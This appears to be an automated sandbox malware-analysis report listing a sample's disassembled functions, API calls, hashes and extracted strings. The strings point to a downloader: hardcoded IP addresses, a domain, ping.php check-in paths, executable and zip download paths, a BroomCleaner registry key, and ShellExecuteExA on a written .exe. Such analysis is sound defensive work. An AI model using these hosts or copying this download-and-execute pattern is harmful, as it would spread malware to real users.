Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: E3526974A01229DFDB64CF98C985BACBBB1BF09304F1580D9E95DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7
SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Strings

@, xrefs: 00419D84

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
Opcode Fuzzy Hash: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 03150E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,03150223,?,?), ref: 03150E19
SetErrorMode.KERNEL32(00000000,?,?,03150223,?,?), ref: 03150E1E

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 0d1c95f19022a271675dd382654040f4dee6c313f8bb3bc0b0dee7df5a06c074
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 8BD01231145128B7D7002BD4DC09BCDBB1CDF09B62F148011FB0DD9080C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00408198 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

std::regex_error::regex_error.LIBCPMT ref: 004081A4

Part of subcall function 00408040: std::exception::exception.LIBCONCRT ref: 00408058

__CxxThrowException@8.LIBVCRUNTIME ref: 004081B2

Part of subcall function 0040ABCB: KiUserExceptionDispatcher.NTDLL(?,?,?,0040996C,?,?,?,?,?,?,?,?,0040996C,?,00438A4C), ref: 0040AC2B

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: DispatcherExceptionException@8ThrowUserstd::exception::exceptionstd::regex_error::regex_error
String ID:
API String ID: 964721716-0
Opcode ID: d62da80a3684c30e6ad3ebe5b93b082f3a99603087db647614469e16434a24a4
Instruction ID: a76997e87f68b3a191f62a2152014b4e80abd2d03d6f885f9787d4c28a8fe2d8
Opcode Fuzzy Hash: d62da80a3684c30e6ad3ebe5b93b082f3a99603087db647614469e16434a24a4
Instruction Fuzzy Hash: 6CC0127045020C66CB00F6A5CC46DBE763CA908200F40082E762021082AA38A118465A

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00409967

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 58d0a893d58f0a7d33637853af1657be7235eebdeb06fd6e02bfa0046e04e277
Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
Opcode Fuzzy Hash: 58d0a893d58f0a7d33637853af1657be7235eebdeb06fd6e02bfa0046e04e277
Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 02F67A4D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02F67A9E

Memory Dump Source

Source File: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F67000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f67000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: ba6311a6e1ca3f1e683a224defbcd53886e14e25d5945c075d8168f51a39b7e8
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 1F113C79A00208EFDB01DF98C989E99BBF5EF08350F058094FA489B361D371EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03174C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 03176823: __EH_prolog.LIBCMT ref: 03176828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 03174D3B

Part of subcall function 031762B1: __EH_prolog.LIBCMT ref: 031762B6
Part of subcall function 031762B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 03176398

Strings

Installed, xrefs: 03175466, 031754C4
P, xrefs: 03175312
/syncUpd.exe, xrefs: 03175923, 031759A5, 03175AD6
/timeSync.exe, xrefs: 031759C6, 03175A59, 03175AC7
iC, xrefs: 03175E24
P, xrefs: 03175D77
185.172.128.228, xrefs: 03175527, 031755CD, 0317574C
\run.exe, xrefs: 03175E37, 03175E8F
185.172.128.228, xrefs: 03175F88, 03176034, 03176139
P, xrefs: 0317575C
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 0317501D, 031751B3, 031751CC
P, xrefs: 03175ABC
note.padd.cn.com, xrefs: 03175BA9, 03175C61, 03175D66
@, xrefs: 03174CE3
/ping.php?substr=%s, xrefs: 031755EE, 031756C4, 031756DC
/BroomSetup.exe, xrefs: 0317604E, 031760F4, 03176142
P, xrefs: 0317614A
185.172.128.203, xrefs: 0317585E, 03175904, 03175AA6
.zip, xrefs: 03175DC4, 03175DE6
185.172.128.90, xrefs: 0317521A, 031752B4, 03175302
185.172.128.59, xrefs: 031757A3, 0317583D, 03175AB4
.exe, xrefs: 03175B18, 03175B3A
SOFTWARE\BroomCleaner, xrefs: 03175358, 0317544C
.exe, xrefs: 0317618D, 031761AF
/1/Package.zip, xrefs: 03175C7B, 03175D15, 03175D6F

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
